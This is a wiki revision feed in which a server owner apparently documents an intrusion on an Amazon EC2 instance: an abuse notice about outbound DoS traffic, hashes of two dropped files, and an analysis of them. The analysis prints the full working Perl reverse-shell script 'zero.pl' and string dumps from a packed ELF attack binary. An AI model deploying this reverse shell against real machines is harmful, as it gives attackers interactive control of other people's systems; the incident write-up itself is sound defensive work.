<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://aznot.com/index.php?action=history&amp;feed=atom&amp;title=Virus%2Fzero.pl</id>
	<title>Virus/zero.pl - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://aznot.com/index.php?action=history&amp;feed=atom&amp;title=Virus%2Fzero.pl"/>
	<link rel="alternate" type="text/html" href="https://aznot.com/index.php?title=Virus/zero.pl&amp;action=history"/>
	<updated>2026-05-09T14:46:08Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.41.0</generator>
	<entry>
		<id>https://aznot.com/index.php?title=Virus/zero.pl&amp;diff=352&amp;oldid=prev</id>
		<title>Kenneth: Created page with &quot;&lt;pre&gt; From: Amazon EC2 Abuse Subject: Your Amazon EC2 Abuse Report [16614771493-2] Date: July 7, 2014 at 6:41:49 AM MST Reply-To: Amazon EC2 Abuse &lt;ec2-abuse@amazon.com&gt;  Dear...&quot;</title>
		<link rel="alternate" type="text/html" href="https://aznot.com/index.php?title=Virus/zero.pl&amp;diff=352&amp;oldid=prev"/>
		<updated>2014-07-08T05:40:25Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; From: Amazon EC2 Abuse Subject: Your Amazon EC2 Abuse Report [16614771493-2] Date: July 7, 2014 at 6:41:49 AM MST Reply-To: Amazon EC2 Abuse &amp;lt;ec2-abuse@amazon.com&amp;gt;  Dear...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
From: Amazon EC2 Abuse&lt;br /&gt;
Subject: Your Amazon EC2 Abuse Report [16614771493-2]&lt;br /&gt;
Date: July 7, 2014 at 6:41:49 AM MST&lt;br /&gt;
Reply-To: Amazon EC2 Abuse &amp;lt;ec2-abuse@amazon.com&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dear Amazon EC2 Customer,&lt;br /&gt;
&lt;br /&gt;
We&amp;#039;ve received a report that your instance(s):&lt;br /&gt;
&lt;br /&gt;
Instance Id: i-XXXXXXXX&lt;br /&gt;
&lt;br /&gt;
has been making Denial of Service attacks against remote hosts on the Internet.&lt;br /&gt;
&lt;br /&gt;
Check the information provided below by the abuse reporter.&lt;br /&gt;
&lt;br /&gt;
This is specifically forbidden in our User Agreement: http://aws.amazon.com/agreement/&lt;br /&gt;
&lt;br /&gt;
Please immediately restrict the flow of traffic from your instances(s) to cease&lt;br /&gt;
disruption to other networks and reply this email to send your reply of action&lt;br /&gt;
to the original abuse reporter. This will activate a flag in our ticketing&lt;br /&gt;
system, letting us know that you have acknowledged receipt of this email.&lt;br /&gt;
&lt;br /&gt;
It&amp;#039;s possible that your environment has been compromised by an external attacker.&lt;br /&gt;
It remains your responsibility to ensure that your instances and all applications&lt;br /&gt;
are secured. The link http://developer.amazonwebservices.com/connect/entry.jspa?externalID=1233&lt;br /&gt;
provides some suggestions for securing your instances.&lt;br /&gt;
&lt;br /&gt;
It has come to our attention that Denial of Service (DoS) attacks were launched from your instance&lt;br /&gt;
to IP XXX.XXX.XXX.XXX via UDP port(s) 80. Please investigate your instance(s) and reply detailing&lt;br /&gt;
the corrective measures you will be taking to address this activity.&lt;br /&gt;
&lt;br /&gt;
Case number: 16614771493-1&lt;br /&gt;
&lt;br /&gt;
Additional abuse report information provided by original abuse reporter:&lt;br /&gt;
* Destination IPs:&lt;br /&gt;
* Destination Ports:&lt;br /&gt;
* Destination URLs:&lt;br /&gt;
* Abuse Time: Mon Jul 07 13:25:43 UTC 2014&lt;br /&gt;
* Log Extract:&lt;br /&gt;
&amp;lt;&amp;lt;&amp;lt;&lt;br /&gt;
It has come to our attention that Denial of Service (DoS) attacks were launched from your instance to&lt;br /&gt;
IP 116.31.100.90 via UDP port(s) 80. Please investigate your instance(s) and reply detailing the&lt;br /&gt;
corrective measures you will be taking to address this activity.&lt;br /&gt;
&lt;br /&gt;
In the meantime, we have blocked outbound UDP 80 on the instance(s) to prevent further abuse.&lt;br /&gt;
&lt;br /&gt;
If you believe that you were compromised by an external attacker, the best recourse is to back up your&lt;br /&gt;
data, migrate your applications to a new instance, and terminate the old one. Attempting to repair a&lt;br /&gt;
compromised instance does not guarantee a successful cleanup in most cases. We recommend reviewing the&lt;br /&gt;
following resources to ensure your EC2 environment is properly secured:&lt;br /&gt;
&lt;br /&gt;
* Amazon EC2 Security Groups User Guide:&lt;br /&gt;
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html&lt;br /&gt;
&lt;br /&gt;
* AWS Security Resources:&lt;br /&gt;
http://aws.amazon.com/security/security-resources/&lt;br /&gt;
&lt;br /&gt;
* AWS Security Best Practices:&lt;br /&gt;
https://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf&lt;br /&gt;
&lt;br /&gt;
Thanks in advance for your attention to this report.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Files found:&lt;br /&gt;
 c3fd28831d9fc683000273643b5bef12  zero.pl&lt;br /&gt;
 4206e8b780cf3758baa76b1002e61792  .Linux_time_y_2015&lt;br /&gt;
&lt;br /&gt;
Guessing they somehow came through a security exploit in ElasticSearch.&lt;br /&gt;
&lt;br /&gt;
zero.pl: (also found here: [https://gist.github.com/siyangbi/6ba19aa68191ab967b40])&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/perl -w&lt;br /&gt;
&lt;br /&gt;
use strict;&lt;br /&gt;
use Socket;&lt;br /&gt;
use IO::Handle;&lt;br /&gt;
&lt;br /&gt;
if($#ARGV+1 != 2){&lt;br /&gt;
print &amp;quot;$#ARGV $0 Remote_IP Remote_Port \n&amp;quot;;&lt;br /&gt;
exit 1;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
my $remote_ip = $ARGV[0];&lt;br /&gt;
my $remote_port = $ARGV[1];&lt;br /&gt;
&lt;br /&gt;
my $proto = getprotobyname(&amp;quot;tcp&amp;quot;);&lt;br /&gt;
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));&lt;br /&gt;
&lt;br /&gt;
my $shell = &amp;#039;/bin/bash -i&amp;#039;;&lt;br /&gt;
&lt;br /&gt;
socket(SOCK, AF_INET, SOCK_STREAM, $proto);&lt;br /&gt;
&lt;br /&gt;
STDOUT-&amp;gt;autoflush(1);&lt;br /&gt;
SOCK-&amp;gt;autoflush(1);&lt;br /&gt;
&lt;br /&gt;
connect(SOCK,$pack_addr) or die &amp;quot;can not connect:$!&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
open STDIN, &amp;quot;&amp;lt;&amp;amp;SOCK&amp;quot;;&lt;br /&gt;
open STDOUT, &amp;quot;&amp;gt;&amp;amp;SOCK&amp;quot;;&lt;br /&gt;
open STDERR, &amp;quot;&amp;gt;&amp;amp;SOCK&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Enjoy the shell.\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
system($shell);&lt;br /&gt;
close SOCK;&lt;br /&gt;
&lt;br /&gt;
exit 0;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
.Linux_time_y_2015: (binary)&lt;br /&gt;
* statically linked executable&lt;br /&gt;
* file: linux: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped&lt;br /&gt;
* strings:&lt;br /&gt;
** &amp;quot;This file is packed with the UPX executable packer http://upx.sf.net&amp;quot;&lt;br /&gt;
* upx decompressed strings:&lt;br /&gt;
** &amp;quot;std::basic_string&amp;quot; -- implies it was a C++ source file&lt;br /&gt;
** &amp;quot;Keld Simonsen&amp;quot; -- fluke?  compiler?&lt;br /&gt;
*** &amp;quot;keld@dkuug.dk&amp;quot;&lt;br /&gt;
*** &amp;quot;+45 3122-6543&amp;quot;&lt;br /&gt;
*** &amp;quot;+45 3325-6543&amp;quot;&lt;br /&gt;
*** &amp;quot;1997-12-20&amp;quot;&lt;br /&gt;
*** &amp;quot;ISO/IEC JTC1/SC22/WG20 - internationalization&amp;quot;&lt;br /&gt;
*** &amp;quot;C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V&amp;quot;&lt;br /&gt;
** &amp;quot;GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)&amp;quot; -- compiler&lt;br /&gt;
** Source files mentioned: (possibly related: [http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html])&lt;br /&gt;
*** Fake.cpp&lt;br /&gt;
*** Global.cpp&lt;br /&gt;
*** main.cpp&lt;br /&gt;
*** Manager.cpp&lt;br /&gt;
*** ServerIP.cpp&lt;br /&gt;
*** StatBase.cpp&lt;br /&gt;
*** ThreadAttack.cpp&lt;br /&gt;
*** ThreadHostStatus.cpp&lt;br /&gt;
*** ThreadTaskManager.cpp&lt;br /&gt;
*** ThreadTimer.cpp&lt;br /&gt;
*** AutoLock.cpp&lt;br /&gt;
*** FileOp.cpp&lt;br /&gt;
*** Log.cpp&lt;br /&gt;
*** Md5.cpp&lt;br /&gt;
*** Media.cpp&lt;br /&gt;
*** NetBase.cpp&lt;br /&gt;
*** ThreadCondition.cpp&lt;br /&gt;
*** Thread.cpp&lt;br /&gt;
*** ThreadMutex.cpp&lt;br /&gt;
*** Utility.cpp&lt;/div&gt;</summary>
		<author><name>Kenneth</name></author>
	</entry>
</feed>